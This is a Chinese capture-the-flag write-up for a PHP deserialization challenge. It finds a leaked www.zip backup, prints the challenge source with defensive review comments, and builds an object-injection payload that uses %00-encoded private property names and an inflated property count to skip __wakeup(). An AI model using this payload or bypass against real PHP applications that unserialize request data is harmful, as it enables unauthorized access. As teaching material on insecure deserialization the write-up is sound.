这个好玩。看到“备份网站”字眼，用 dirsearch 扫描。
在 Kali 里打开。
爆破出一个 www.zip 文件。把整站备份放在 Web 根目录下，等于把源码直接交给任何访问者；备份应当存放在站点目录之外。
访问一下，解压后其中的 class.php 如下：
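<?php
// Brings $flag (assigned in flag.php) into the global scope.
include 'flag.php';

// Turns off all PHP error reporting for the rest of the request.
error_reporting(0);

/**
 * Credential holder from the challenge's class.php.
 *
 * Review notes (defensive reading of the code):
 *  - Every decision is taken in __destruct(), which PHP runs for any instance,
 *    including one created by unserialize(). index.php on this page passes
 *    $_GET['select'] to unserialize(), so both private fields are fully
 *    controlled by the request when the destructor runs.
 *  - __wakeup() is the only step that resets the username after
 *    deserialization. A magic method is not an access control: the serialized
 *    string shown later on this page declares more properties than the object
 *    has, which older PHP releases answer by skipping __wakeup().
 *  - Mitigation: never unserialize() request data. Use a data-only format such
 *    as JSON, or pass ['allowed_classes' => false] as the second argument, and
 *    keep privilege decisions out of destructors.
 */
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    /**
     * @param mixed $username value stored as the user name
     * @param mixed $password value stored as the password
     */
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    /**
     * Invoked by PHP after unserialize(); forces the user name to 'guest'.
     */
    function __wakeup(){
        $this->username = 'guest';
    }

    /**
     * Prints the flag when password loosely equals 100 and username is exactly
     * 'admin'; otherwise prints a message and ends the script with die().
     */
    function __destruct(){
        // Loose comparison: the string "100" passes as well as the integer 100.
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            // NOTE(review): both fields are echoed without HTML escaping.
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            // $flag comes from the include at the top of this file.
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>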
由 __destruct() 可知，输出 flag 需要同时满足：
username=admin
password=100
flag.php
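<?php
// Sample flag value for this local copy of the challenge; class.php pulls it in
// with include and echoes it from Name::__destruct().
// NOTE(review): a secret kept in a PHP file inside the site directory travels
// with any archive made of that directory (such as the www.zip found above).
$flag = 'Syc{dog_dog_dog_dog}';
?>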
index.php
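<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
  <link rel="stylesheet" href="style.css">
</head>
<style>
    #login{
        position: absolute;
        top: 50%;
        left:50%;
        margin: -150px 0 0 -150px;
        width: 300px;
        height: 300px;
    }
    h4{
        font-size: 2em;
        margin: 0.67em 0;
    }
</style>
<body>
<div id="world">
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳所以我有一个良好的备份网站的习惯
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
    <?php
    // Loads the Name class, whose __wakeup()/__destruct() magic methods run
    // automatically for any object that unserialize() creates below.
    include 'class.php';
    // Raw, unvalidated query-string parameter.
    $select = $_GET['select'];
    // SECURITY (review): unserialize() on request data is PHP object injection.
    // The caller picks the class and every property value, and the object's
    // destructor runs with those values. Left unchanged here because it is the
    // behaviour this write-up studies. In real code, accept JSON (json_decode)
    // instead, or at minimum call unserialize($select, ['allowed_classes' => false]).
    $res=unserialize($select);
    ?>
    </div>
    <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover cl4y</p></div>
</div>
<script src="http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js"></script>
<script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js"></script>
<script src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js"></script>
<script src="index.js"></script>
</body>
</html>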
index.php 中有一段 PHP 代码：
`include 'class.php';` 引入了 class.php；`$select = $_GET['select'];` 定义了变量 select，用来存放 GET 请求传入的 select 参数；
`$res=unserialize($select);` 将一个字符串反序列化为一个 PHP 变量。这里被反序列化的内容完全由用户控制，这正是 PHP 对象注入问题的根源。下面在本地构造同名的类并序列化：
<?php
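// Local reproduction helper: a class with the same name and private property
// names as the one in class.php, holding the values that __destruct() checks
// for, serialized and printed.
class Name{
    private $username = 'admin';
    // A string, which is what the s:3:"100" in the printed output corresponds to.
    private $password = '100';
}
$select = new Name();
$res = serialize($select);
// Private property names are serialized as "\0Name\0username": the two NUL
// bytes do not show in a terminal or browser, which is why the declared
// length is 14 although only 12 characters are visible.
echo $res;
?>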
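运行得到用于反序列化的序列化字符串：
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
私有属性名的实际形式是 \0Name\0username（类名两侧各有一个不可见的空字节，所以长度是 14）。放进 URL 时空字节要写成 %00，同时把属性个数由 2 改成 3，使旧版本 PHP 在反序列化时跳过 __wakeup()（该行为在较新的 PHP 版本中已被修复）：
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}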